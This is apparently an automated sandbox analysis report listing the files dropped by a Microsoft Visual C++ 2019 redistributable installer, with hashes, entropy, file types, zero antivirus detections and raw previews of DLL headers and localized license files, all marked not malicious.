                                                                        SHA-512:DE9758B1EAE1C2F1375B415B44DC2B8C3B65FAFAE9AAAB53DB85341F7C00F9499D9DDA9A80A89A3D4FC7F4F7BFFD335564863D5A2EA7719D59E13F7D1EE4F87A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........zv.d.%.d.%.d.%=..$.d.%=..$.d.%=..$.d.%...%.d.%...$.d.%...$.d.%=..$.d.%.d.%.`.%...$.d.%...$.d.%...$te.%...$.d.%...%.d.%...$.d.%Rich.d.%........PE..d...SbKx.........." ..."..-..X).....`F,.......................................V.......V...`A..........................................:.....H.;.......?.`....P=..8....V.PO...@U.(p..P.5.p............................q..@............0-.X.....:......................text...l.-.......-................. ..`.rdata.......0-.......-.............@..@.data....6....<.......;.............@....pdata...8...P=..:....<.............@..@.didat..H.....?.......>.............@....rsrc...`.....?.......?.............@..@.reloc..(p...@U..r....T.............@..B........................................................................................................................................................................................

                                                                        C:\Windows\System32\mfcm140.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):96592
                                                                        Entropy (8bit):6.371033376303132
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Gnn+7eH5QzDxoBTYy+Ajw1dSj6tYhuW0swuw4N3P+ucQUCf9XzuiYIFf9Xzuv:G+S2zDxoBTxT6tYhuW0s/NPbcFCf9Xfo
                                                                        MD5:82E66964F91445140EBAD6563A61AFEC
                                                                        SHA1:B981C47029F23EF809837CBD5EB6DD78C895849C
                                                                        SHA-256:3970DF10C373E72BF929D9D07F40564B89106227349B0CD3A68F485B75D639A7
                                                                        SHA-512:0B912F8E510EB0158BA0091DFF73B94D223F86CC1BE1C0DDA28E044EEB1BBF4103B5B74C90BB9D6CFC3B0B72EC95D48B6693042242A68CD2F5CC3041D4C03AF9
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............eoL.eoL.eoLy.kM.eoL.7.L.eoL..nM.eoL..kM.eoL..lM.eoL...L.eoLy.nM.eoL.enL.eoL..jM.eoL..oM.eoL...L.eoL..mM.eoLRich.eoL........................PE..d.....A..........." ...".F...........O...............................................t....`A.........................................1.......2.......p.......`.......*..PO...........y..p...........................px..@............p..x............u..H............text....A.......B.................. ..`.nep.........`.......F.............. ..`.rdata.......p.......J..............@..@.data...X....@......................@....pdata.......`....... ..............@..@.rsrc........p.......$..............@..@.reloc...............(..............@..B........................................................................................................................................................................................

                                                                        C:\Windows\System32\mfcm140u.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):96592
                                                                        Entropy (8bit):6.367271194012751
                                                                        Encrypted:false
                                                                        SSDEEP:1536:MnKBn5WzzDxSnM5yj6A+JGY0swu6fpXqmLuDhM9nXzuk0lplnXzuk6:pBszDxSnM566A+JGY0sqamaDSX8lX8
                                                                        MD5:386B853F3D5B6A16055C9591BD938F3A
                                                                        SHA1:10A78EF8DC72D010A97BF504B012D0CFE769CFF4
                                                                        SHA-256:F56F5B8208DD2376D4F50F4B3C1689B8DB4D17A4623FF2B8DF71EA9E1721DFF2
                                                                        SHA-512:4BB02FC38884C43E35DFF4019C605A76F5CE1661CA69492CE23D2C13674A0D184786FF17CEEDFACA6653F85CF49B3CDDA9ECB766DE2DFCFA4F72D8273F138475
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............eoL.eoL.eoLy.kM.eoL.7.L.eoL..nM.eoL..kM.eoL..lM.eoL...L.eoLy.nM.eoL.enL.eoL..jM.eoL..oM.eoL...L.eoL..mM.eoLRich.eoL........................PE..d................." ...".F...........O..............................................".....`A.........................................1.......2.......p.......`.......*..PO...........y..p...........................px..@............p..x............u..H............text....A.......B.................. ..`.nep.........`.......F.............. ..`.rdata.......p.......J..............@..@.data...X....@......................@....pdata.......`....... ..............@..@.rsrc........p.......$..............@..@.reloc...............(..............@..B........................................................................................................................................................................................

                                                                        C:\Windows\System32\msvcp140.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):579920
                                                                        Entropy (8bit):6.52239950023068
                                                                        Encrypted:false
                                                                        SSDEEP:12288:LrkOYDWQRan8Rqpp8v4cTbu/nVfKgn+6aFoVmUPyGcNz+QEKZm+jWodEEVGmHHl:L1VmUqcQEKZm+jWodEEk4l
                                                                        MD5:0929E46B1020B372956F204F85E48ED6
                                                                        SHA1:9DC01CF3892406727C8DC7D12AD8855871C9EF09
                                                                        SHA-256:CB3C74D6FCC091F4EB7C67EE5EB5F76C1C973DEA8B1C6B851FCCA62C2A9D8AA8
                                                                        SHA-512:DD28FCA139D316E2CC4D13A6ADFFB7AF6F1A9DC1FC7297976A4D5103FAE44DE555A951B99F7601590B331F6DBB9BFC592D31980135E3858E265064117012C8D5
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@\...\...\.......X...U.%.J...\..........Y......T......X............].....I.]......]...Rich\...................PE..d....}Y..........." ...".H...Z.......3....................................................`A.........................................B..h.......@............... :......PO...... ...@...p...............................@............`...............................text....G.......H.................. ..`.rdata..\....`.......L..............@..@.data....8...@......."..............@....pdata.. :.......<...@..............@..@.rsrc................|..............@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\msvcp140_1.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):35664
                                                                        Entropy (8bit):6.593060494290354
                                                                        Encrypted:false
                                                                        SSDEEP:384:s1vZLstUQjOoKFYVWcM5gW9EutSt+ed8QtR9z//glxyeHRN7vk58QtR9z//gpjYw:spCtzjOjKGkHUQP9zHK3QP9zK
                                                                        MD5:C385EBC3A83D842489021E48E23BC925
                                                                        SHA1:0A992ABB2E424DA981196EDB280E7821F2033D9F
                                                                        SHA-256:8E49A6D937EE6AC20D949629B54E28CAF01AEF312BC7184063280346B35899E3
                                                                        SHA-512:85CC4C9FBEACDDC934D46D907354C1FE93DC62B1BAD7A6CCDB7C9101E820D01717E863FAB39DD6BC062F38A100F03D49EBE2B3905146BCEDFC6C014703D8C3B3
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}.Y.............n.......dn......`.......`...............`.......`.......`.......`.......`......Rich............PE..d...D.+.........." ...".....&...........................................................`A.........................................?..L...<A..x....p.......`.......<..PO...........4..p...........................`3..@............0..8............................text............................... ..`.rdata..2....0......................@..@.data........P......................@....pdata.......`.......2..............@..@.rsrc........p.......6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\msvcp140_2.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):197456
                                                                        Entropy (8bit):6.635988442488691
                                                                        Encrypted:false
                                                                        SSDEEP:3072:emnW8UQ7ORW0cNFSCYzwUT1VUxwO1Mkz1wN6jAUjEgi8H0NpScUuhIW4Wbx:eEVP5FSCYbPUxKkEWShIo1
                                                                        MD5:4B27F209925C247252BABEFF90D6CD2A
                                                                        SHA1:709DC2E8A03A9F261C64ADF3F1C0839DE62DDF52
                                                                        SHA-256:25305353C51AC72F4646BD549493BECDBD6C997605F70C937E72CAD3F962182D
                                                                        SHA-512:30E8EF20EC13ABE50A13319159EB2BA1EBB117E1E4C438E24DE48331ACAB34D8AF3531E051CD93597EB5BEDE0AF81AE223A06DAA072FF226D79240FFFF68B7A6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~.............+..............................................................Rich............PE..d................" ..."..................................................................`A................................................X...........................PO.......... M..p............................K..@...............P............................text............................... ..`.rdata..6...........................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\msvcp140_atomic_wait.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):50000
                                                                        Entropy (8bit):6.6288466564529065
                                                                        Encrypted:false
                                                                        SSDEEP:768:yHjBCiRZC7XVLgKaA3XO6NVOHG3l9zwKI3l9zE:vlLgKp3XOeVcGHzXIHzE
                                                                        MD5:C79B59C4522833628C19F9AE74BDC054
                                                                        SHA1:51F4EDB0B8D19DBBAE68B0FEEDCB5B30DEDA3B44
                                                                        SHA-256:6816A8212A20072E5D34D56D9BDC3C8FD8EE0759343A7936D237622F30E2508A
                                                                        SHA-512:9487AFC32F35F1D3EFA803525B3CB0B6C5722E4DAFC22ECC2BE7CD69C83A82F42746A6F959419BE4BAA6A5C2D323812E5F4E0AA6C43D41EF69DE742F18C15999
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.c.U.0.U.0.U.0>'.1.U.0.-C0.U.0.).1.U.0.).1.U.0.U.0.U.0.).1.U.0.).1.U.0.).1.U.0.)/0.U.0.).1.U.0Rich.U.0........................PE..d.../.P..........." ...".:...........>.......................................@......9.....`A........................................@f..D....k....... ..........P....t..PO...0..\...pX..p...........................0W..@............P..H............................text...n9.......:.................. ..`.rdata...$...P...&...>..............@..@.data...............d..............@....pdata..P............f..............@..@.rsrc........ .......l..............@..@.reloc..\....0.......r..............@..B................................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\msvcp140_codecvt_ids.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):31568
                                                                        Entropy (8bit):6.784944828286826
                                                                        Encrypted:false
                                                                        SSDEEP:384:fnhXaOURZWiuEWautSt+ep8QtR9z//g6IDyeHRN7mcQ8QtR9z//gv3EH:fkOTYH4QP9zJKJQP9zbH
                                                                        MD5:CBE84FF1C31A46517CEE75D2F0A131C9
                                                                        SHA1:56FA7AFCE430D59F9B5B8C3A284D2214EA5A0DF6
                                                                        SHA-256:478E7A1EEC4E4D80A2600DA355A0BD741505CD6BD33AE8E8B1604B66FF94711B
                                                                        SHA-512:5E5B5453CDF00D7E07816226CB78431BE58303457A88A1C60CEC6A1DBD0D25F72C6917312D8686AE5C40919FAE4C7EE80B62A309ED44B154F57D73EDD91E65F1
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........)...z...z...z|..{...z..Uz...z...{...z...z...z...{...z...{...z...{...z...{...z..9z...z...{...zRich...z........PE..d................." ..."............P........................................p......(.....`A........................................p(..0....)..P....P.......@.......,..PO...`..,...."..p............................!..@............ ...............................text............................... ..`.rdata..B.... ......................@..@.data........0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\vcamp140.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):414544
                                                                        Entropy (8bit):6.39872237716585
                                                                        Encrypted:false
                                                                        SSDEEP:6144:nmU5qgKJWj8R7V6JozBVgNSp8iC7PGirS7HLrOhMcvyUwUZOqz0iTx9a9T:maAJWj8xV6GdyNSp8iC7PGGS7POkBP
                                                                        MD5:7DBCAF6B03B97163731F391395406C4E
                                                                        SHA1:340CB672F4A80EC76D8B2E758E4E9880C66E8A3D
                                                                        SHA-256:33BFAF7EC048215B7CE55F61444A5361309BA01B73AD40C192FD647A676E63C3
                                                                        SHA-512:AF4679D5F39768DC8628F785FA19855E73D24710302861C51C9A115BFF97B4B4A17B01AE2E21ECC469528382B13805E5687459D8C86341C8B98DBC234C8AA880
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nU.I.;.I.;.I.;.@w..E.;..s:.A.;..s>.W.;..s?.A.;..s8.O.;..}:.D.;.I.:...;..s2.E.;..s;.H.;..s.H.;.I...H.;..s9.H.;.RichI.;.........................PE..d....8.@.........." ...".....L......@R.......................................P............`A........................................`0..,8...h..T.......8$.......6......PO...@..P....9..p....................:..(...p8..@............................................text...|........................... ..`.rdata..P...........................@..@.data....3.......,...r..............@....pdata...6.......8..................@..@.rsrc...8$.......&..................@..@.reloc..P....@......................@..B................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\vccorlib140.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):345936
                                                                        Entropy (8bit):6.045245777392109
                                                                        Encrypted:false
                                                                        SSDEEP:6144:MXkEvKJuQW9sR2Dr8NZrK6nVYDPE+kaCih8vev:ekEwhW9shn+Dc8hcI
                                                                        MD5:A767DDF1EAE2C38A59312D304C803BC0
                                                                        SHA1:5204A25FE8AF8C21DE3305966B6BB17043656168
                                                                        SHA-256:D7731A1DF856D0A19344FD0B80DADD4E4BE6B6136236FBA6543BB66C1F015E81
                                                                        SHA-512:4F892A698ECFEF06897747E47035768FB4F132B41C60FA26430CBC1F0C3608DE744FFF27B2CAE46114C1CE72BC6E58E3C4D1F8350D414AE16958CE21F89C1A9F
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............L...L...L..\L...L...M...L...M...L...M...L...M...L ..M...L...L...L...M...L...M...L..0L...L...M...LRich...L................PE..d...&J)".........." ...".....|.......{.......................................0............`A.............................................>..D...,................ ......PO..............p...........................p...@............................................text...v~.......................... ..`.rdata..............................@..@.data........ ......................@....pdata... ......."..................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\vcomp140.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):191824
                                                                        Entropy (8bit):6.448531042380911
                                                                        Encrypted:false
                                                                        SSDEEP:3072:1BFc8DO8nun2cxR4nGP6A4zWBxgXkNe0IOdPctDksog9j+r/A/U:3Cp8nu1xRoVzACUg814a/H
                                                                        MD5:9312D1B8DF74830B285820276ECD5DDA
                                                                        SHA1:4CB1CBE8003EE4CD352AC37C44E958F7DD8CDECA
                                                                        SHA-256:CB721F775CDEE730D9D69EBD9E723C05A99EE1805F8D23A52A74FC015AA3D965
                                                                        SHA-512:C49415EBDE6B8B586D6CBDAD2CB4D8CDBC245CB681759918D37025652BAD288406AC9168C0C549C4ED9060AD5C5EBA025A4691014783B8CD38CE5A7B901DE9AE
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................p.......p......p.......................p......................................................Rich............................PE..d.....l..........." ..."..... ......@h..............................................X^....`A........................................._.......l..(.......................PO......0....B..p............................A..@............................................text............................... ..`.rdata..<...........................@..@.data....%...........`..............@....pdata...............l..............@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................

                                                                        C:\Windows\System32\vcruntime140.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):109392
                                                                        Entropy (8bit):6.643764685776923
                                                                        Encrypted:false
                                                                        SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                                        MD5:870FEA4E961E2FBD00110D3783E529BE
                                                                        SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                                        SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                                        SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d.....y..........." ...".....`.......................................................5....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                        C:\Windows\System32\vcruntime140_1.dll

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):49488
                                                                        Entropy (8bit):6.652691609629867
                                                                        Encrypted:false
                                                                        SSDEEP:768:8EgYXUcHJcUJSDW/tfxL1qBS3hO6nb/TEHEXi9zufUKQXi9zug:8vGS8fZ1eUpreA+zuTc+zug
                                                                        MD5:BBA9680BC310D8D25E97B12463196C92
                                                                        SHA1:9A480C0CF9D377A4CAEDD4EA60E90FA79001F03A
                                                                        SHA-256:E0B66601CC28ECB171C3D4B7AC690C667F47DA6B6183BFF80604C84C00D265AB
                                                                        SHA-512:1575C786AC3324B17057255488DA5F0BC13AD943AC9383656BAF98DB64D4EC6E453230DE4CD26B535CE7E8B7D41A9F2D3F569A0EFF5A84AEB1C2F9D6E3429739
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............L...L...L...M...L...M...L.FL...L...L...L...M...L...M...L...M...L...M...L..*L...L...M...LRich...L........................PE..d...%CU..........." ...".<...8.......A...............................................@....`A........................................0m.......m..x....................r..PO......D....c..p...........................pb..@............P..h............................text...0:.......<.................. ..`.rdata..."...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................

                                                                        C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):650568
                                                                        Entropy (8bit):7.222670928617801
                                                                        Encrypted:false
                                                                        SSDEEP:12288:inMwHskY7gjcjhVIEhqgM7bWvcsi6aVKrIysU40vy3W/ceKSHMsiFyY6XN2:sMysZgjS1hqgSC/izGfHjymk4HM5yJ
                                                                        MD5:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        SHA1:8F4D4A1AFA9FD985C67642213B3E7CCF415591DA
                                                                        SHA-256:5A61F9775032457DB28EDD41F98F08C874E759F344EA8475C9AC8ABBBA68DE12
                                                                        SHA-512:FF8B87E7746ECF19A150874DEDD6EA4C51C76CFC291C5A80D9E5073A9BBBB2BD6ED7D10425B083578DC8D28D0D905E379FA3F919A60979E5B5C44EBC0AC613E6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p.......?....@..............................................;..........0....(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1028\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18127
                                                                        Entropy (8bit):4.036737741619669
                                                                        Encrypted:false
                                                                        SSDEEP:192:xaz+aCQbjdBCLCgfvtfLEmmVxJzLKLIW7cBFCoSM0fvJ93eyryH1MqG1xcRY/c5f:seh/IMHexG4q2
                                                                        MD5:B7F65A3A169484D21FA075CCA79083ED
                                                                        SHA1:5DBFA18928529A798FF84C14FD333CB08B3377C0
                                                                        SHA-256:32585B93E69272B6D42DAC718E04D954769FE31AC9217C6431510E9EEAD78C49
                                                                        SHA-512:EDA2F946C2E35464E4272B1C3E4A8DC5F17093C05DAB9A685DBEFD5A870B9D872D8A1645ED6F5B9A72BBB2A59D22DFA58FBF420F6440278CCBE07B6D0555C283
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fb\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a3\'ac\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\'bb\'f2\'b1\'be\'dc\'9b\'f3\'77\'d6\'ae\'b8\'fc\'d0\'c2\'a3

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1028\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):6.163758160900388
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
                                                                        MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                        SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                        SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                        SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1029\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13053
                                                                        Entropy (8bit):5.125552901367032
                                                                        Encrypted:false
                                                                        SSDEEP:192:TKwfs7OUpXLa5HEXQwNCNvZSjotXxiwH++3kamdEj6ZDbugDHgbGNlv6NbrYGY9x:Lfs7c5DRH0aHmJGpafU0AliwGra2
                                                                        MD5:B408556A89FCE3B47CD61302ECA64AC9
                                                                        SHA1:AAC1CDAF085162EFF5EAABF562452C93B73370CB
                                                                        SHA-256:21DDCBB0B0860E15FF9294CBB3C4E25B1FE48619210B8A1FDEC90BDCDC8C04BC
                                                                        SHA-512:BDE33918E68388C60750C964CDC213EC069CE1F6430C2AA7CF1626E6785C7C865094E59420D00026918E04B9B8D19FA22AC440F851ADC360759977676F8891E7
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z\~jej\f0\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte) a\~v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI TYTO

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1029\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3333
                                                                        Entropy (8bit):5.370651462060085
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
                                                                        MD5:16343005D29EC431891B02F048C7F581
                                                                        SHA1:85A14C40C482D9351271F6119D272D19407C3CE9
                                                                        SHA-256:07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
